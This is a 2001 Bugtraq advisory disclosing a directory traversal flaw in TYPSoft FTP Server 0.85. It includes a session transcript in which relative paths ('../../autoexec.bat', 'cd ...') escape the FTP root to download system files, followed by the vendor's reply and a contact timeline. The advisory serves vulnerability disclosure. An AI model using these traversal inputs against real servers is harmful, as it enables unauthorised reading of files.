Bugtraq mailing list archives
Vulnerability in TYPSoft FTP Server
From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:27:57 -0500
----- Begin Hush Signed Message from joetesta () hushmail com ----- Vulnerability in TYPSoft FTP Server Overview TYPSoft FTP Server v0.85 is an ftp server available from http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability exists which allows a remote attacker to break out of the ftp root using relative paths (ie: '...'). Details The following is an illustration of the problem: % ftp localhost Connected to xxxxxxxxxx.rh.rit.edu. 220 TYPSoft FTP Server 0.85 ready... User (xxxxxxxxxx.rh.rit.edu:(none)): jdog 331 Password required for jdog. Password: 230 User jdog logged in. ftp> pwd 257 "/C:/directory/directory/" is current directory. ftp> get ../../autoexec.bat 200 Port command successful. 150 Opening data connection for ../../autoexec.bat. 226 Transfer complete. ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec. ftp> cd .. 501 CWD failed. No permission ftp> cd ... 250 CWD command successful. "/C:/directory/directory/.../" is current directory. ftp> pwd 257 "/C:/directory/directory/.../" is current directory. ftp> get config.sys 200 Port command successful. 150 Opening data connection for config.sys. 226 Transfer complete. ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec. ftp> Solution
Date: Sat, 24 Feb 2001 01:39:23 -0500 Subject: Re: Vulnerability in TYPSoft FTP Server From: TYPSoft <typsoft () altern org> To: joetesta () hushmail com Hi I have try to fix this problem. I test I have made seem to be OK. Thanks for the report Marc TYPSoft
Unfortunately, I do not have the resources to verify this fix at this time. Thus, I urge users to proceed with caution. Vendor Status TYPSoft was contacted via <typsoft () altern org> on Wednesday, February 21, 2001. - Joe Testa ( e-mail: joetesta () hushmail com / AIM: LordSpankatron ) ----- Begin Hush Signature v1.3 ----- CCyeaZ11wOzc4By+rx1GtdKkD9gDG1/WAGHJFUhNZz/sgpcfsBCSqSLWjwIoSl8Atqqv k83hLlTNlsRS5rzSkS+7yx37hSlR5mwy/2VC0DYd6g8/vMUSp2uQ59wfxZjasWeSx3t/ sA61/cuAT30osMp9YCCy1i4+/7/ReyGJERQQtQIiLuVvN43EWcMVvTGmDJgOqvLErGVu I4seQjpawANb/Nis9zJbKYjbBycaew5xGeZ8d51tyt8It5sO/Pf7+2lKBYinWk7tV75/ yrkEpVd23MXtn9xW0c+9GiwvUlUTyhKkfQe3crhHxJywTWhbq1MOp5pQMaksAm/87CQc y8+ZrbDW8SWKh3ozKiot5CgK4gMd2jSbLJ/IUxY8A2GisMU96GyGUTsC7Jzmng9UG/mK YlWtalAbucV/TJgHFyyy9zbmQ4X+TLez8ewrU6hXnOLwuW9K8Pgt1/2O99mdZMoU+Uuf g1Obvd2TlDtRwk9MNQcriBktRi03WJIJtomI74GIx5TO ----- End Hush Signature v1.3 ----- This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools Free, encrypted, secure Web-based email at www.hushmail.com
Current thread:
- Vulnerability in TYPSoft FTP Server joetesta (Feb 28)